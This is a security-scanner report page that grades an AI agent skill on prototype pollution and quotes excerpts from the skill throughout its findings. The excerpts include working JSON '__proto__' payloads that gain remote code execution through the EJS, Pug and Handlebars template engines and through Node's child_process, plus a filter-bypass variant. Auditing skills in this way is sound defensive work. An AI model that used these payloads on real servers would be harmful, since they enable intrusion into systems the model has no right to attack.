prototype-pollution-advanced

github.com/yaklang/hack-skills

Verdict: Proceed with caution

0 critical0 high22 medium

SCORE 55 / 100

$skillox install prototype-pollution-advancedSoon

Why grade C?

score · 55 / 100

The current grade reflects 22 medium findings (6+ MEDs → C).

0 CRIT0 HIGH22 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 17 of 22 MED (cap is 5).
A
Reach Atarget score 95
Resolve 20 of 22 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Latest scan findings

Scan crawl-plkgb4zq9kpo8b2hzusqsrtx · Thu, 28 May 2026 17:27:40 GMT · 2ms

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 9CWE-78

▾

7# SKILL: Prototype Pollution Advanced — RCE & Gadget Exploitation

9> **AI LOAD INSTRUCTION**: Advanced prototype pollution escalation. Covers server-side RCE via template engines (EJS, Pug, Handlebars), Node.js child_process gadgets, client-side script gadgets, filter bypass patterns, and systematic detection. Load [../prototype-pollution/SKILL.md](../prototype-pollution/SKILL.md) first for fundamentals (merge sinks, `__proto__` vs `constructor.prototype`, basic probes).← spawns a subprocess outside declared capabilities

11## 0. RELATED ROUTING

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 25CWE-78

▾

23## 1. SERVER-SIDE PP → RCE

25### 1.1 Node.js child_process.spawn — Shell/ENV Injection← spawns a subprocess outside declared capabilities

27When `child_process.spawn` or `child_process.fork` is called without explicit `env`/`shell` options, it inherits from `Object.prototype`:

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 27CWE-78

▾

25### 1.1 Node.js child_process.spawn — Shell/ENV Injection

27When `child_process.spawn` or `child_process.fork` is called without explicit `env`/`shell` options, it inherits from `Object.prototype`:← spawns a subprocess outside declared capabilities

29```javascript

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 31CWE-78

▾

29```javascript

30// Vulnerable pattern (very common):

31const { execSync } = require('child_process');← spawns a subprocess outside declared capabilities

32execSync('ls'); // inherits shell, env from prototype

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 32CWE-78

▾

30// Vulnerable pattern (very common):

31const { execSync } = require('child_process');

32execSync('ls'); // inherits shell, env from prototype← spawns a subprocess outside declared capabilities

34// Pollution for RCE:

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 36CWE-78

▾

34// Pollution for RCE:

35Object.prototype.shell = '/proc/self/exe';

36Object.prototype.argv0 = 'console.log(require("child_process").execSync("id").toString())//';← spawns a subprocess outside declared capabilities

37Object.prototype.NODE_OPTIONS = '--require /proc/self/cmdline';

38// Next child_process call executes attacker code

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 38CWE-78

▾

36Object.prototype.argv0 = 'console.log(require("child_process").execSync("id").toString())//';

37Object.prototype.NODE_OPTIONS = '--require /proc/self/cmdline';

38// Next child_process call executes attacker code← spawns a subprocess outside declared capabilities

39```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 53CWE-78

▾

51```json

52// Pollution payload:

53{"__proto__": {"outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');s"}}← spawns a subprocess outside declared capabilities

55// When EJS renders ANY template after pollution:

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 56CWE-78

▾

55// When EJS renders ANY template after pollution:

56// Compiled function includes: var x;process.mainModule.require('child_process').execSync('id');s = "";← spawns a subprocess outside declared capabilities

57// → RCE

58```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 67CWE-78

▾

66```json

67{"__proto__": {"block": {"type": "Text", "val": "x]);process.mainModule.require('child_process').execSync('id');//"}}}← spawns a subprocess outside declared capabilities

68```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 73CWE-78

▾

72```json

73{"__proto__": {"self": true, "line": "x]});process.mainModule.require('child_process').execSync('id');//"}}← spawns a subprocess outside declared capabilities

74```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 81CWE-78

▾

80```json

81{"__proto__": {"type": "Program", "body": [{"type": "MustacheStatement", "path": {"type": "PathExpression", "original": "constructor.constructor('return process.mainModule.require(`child_process`).execSync(`id`)')()","parts": ["constructor","constructor"]}, "params": [], "hash": null}]}}← spawns a subprocess outside declared capabilities

82```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 88CWE-78

▾

86```json

87{"__proto__": {"allowProtoMethodsByDefault": true, "allowProtoPropertiesByDefault": true}}

88// Then use {{#with this as |obj|}}{{obj.constructor.constructor "return process.mainModule.require('child_process').execSync('id')"}}{{/with}}← spawns a subprocess outside declared capabilities

89```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 94CWE-78

▾

93```json

94{"__proto__": {"type": "Code", "value": "global.process.mainModule.require('child_process').execSync('id')"}}← spawns a subprocess outside declared capabilities

95```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 102CWE-78

▾

100

101```json

102{"__proto__": {"view options": {"outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');s"}}}← spawns a subprocess outside declared capabilities

103```

104

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 257CWE-78

▾

255 ├── Express + Pug → block gadget (Section 1.3)

256 ├── Express + Handlebars → type/program gadget (Section 1.4)

257 ├── Any Node.js with child_process → shell/NODE_OPTIONS (Section 1.1)← spawns a subprocess outside declared capabilities

258 ├── Client-side jQuery → DOM gadgets (Section 2.1)

259 ├── Client-side Lodash → template/sourceURL (Section 2.2)

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 286CWE-78

▾

284│ │ │ └── Unknown → try each gadget from KNOWN_GADGETS.md

285│ │ │

286│ │ ├── child_process used anywhere?← spawns a subprocess outside declared capabilities

287│ │ │ ├── YES → __proto__.shell + NODE_OPTIONS (Section 1.1)

288│ │ │ └── MAYBE → inject and trigger error to reveal stack

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 322CWE-78

▾

320```json

321// EJS RCE

322{"__proto__":{"outputFunctionName":"x;process.mainModule.require('child_process').execSync('id');s"}}← spawns a subprocess outside declared capabilities

323

324// Pug RCE

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 325CWE-78

▾

323

324// Pug RCE

325{"__proto__":{"block":{"type":"Text","val":"x]);process.mainModule.require('child_process').execSync('id');//"}}}← spawns a subprocess outside declared capabilities

326

327// child_process RCE (Node.js)

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 327CWE-78

▾

325{"__proto__":{"block":{"type":"Text","val":"x]);process.mainModule.require('child_process').execSync('id');//"}}}

326

327// child_process RCE (Node.js)← spawns a subprocess outside declared capabilities

328{"__proto__":{"shell":"node","NODE_OPTIONS":"--require /proc/self/cmdline"}}

329

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 334CWE-78

▾

332

333// Filter bypass (constructor path)

334{"constructor":{"prototype":{"outputFunctionName":"x;process.mainModule.require('child_process').execSync('id');s"}}}← spawns a subprocess outside declared capabilities

335

336// Safe detection probe

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

View latest scan →

skillox.io/c/prototype-pollution-advanced

Skill facts

Latest grade: C · 55
Total scans: 1
Latest version: —
Last scanned: 2026-05-28
Source: yaklang/hack-skills

AIBOM

What this skill accesses

No manifest

Declared (from capabilities)

No capabilities block in frontmatter — the skill doesn't state what it should access.

Observed (from scan findings)

Subprocess invocations

### 1.1 Node.js child_process.spawn — Shell/ENV Injection
// Compiled function includes: var x;process.mainModule.require('child_process')
// Next child_process call executes attacker code
// Then use {{#with this as |obj|}}{{obj.constructor.constructor "return process
// child_process RCE (Node.js)
> **AI LOAD INSTRUCTION**: Advanced prototype pollution escalation. Covers serve
Object.prototype.argv0 = 'console.log(require("child_process").execSync("id").to
When `child_process.spawn` or `child_process.fork` is called without explicit `e

AIBOM (Application Skills Bill of Materials) — see /docs/concepts/aibom for the format.

Version history

Only this scan

No other scans on record for this skill name. New scans appear here as the catalog re-crawls or creators request a re-scan.

Embed badge

Show this grade in your README.

Tracks the latest grade automatically. Updates within five minutes of every re-scan.

Markdown

[![SkillOx grade](https://api.skillox.io/badge/prototype-pollution-advanced.svg)](https://skillox.io/c/prototype-pollution-advanced)

Markdown · score

[![SkillOx score](https://api.skillox.io/badge/score/prototype-pollution-advanced.svg)](https://skillox.io/c/prototype-pollution-advanced)

HTML

<a href="https://skillox.io/c/prototype-pollution-advanced"><img src="https://api.skillox.io/badge/prototype-pollution-advanced.svg" alt="SkillOx grade"/></a>

reST

.. image:: https://api.skillox.io/badge/prototype-pollution-advanced.svg
   :target: https://skillox.io/c/prototype-pollution-advanced
   :alt: SkillOx grade

Coming soon

Creator verification badge, expert-review status, and Cosign-signed release attestation appear here as those layers ship. AIBOM + version history are live; the others follow once the creator portal completes its identity-proof + signing surface.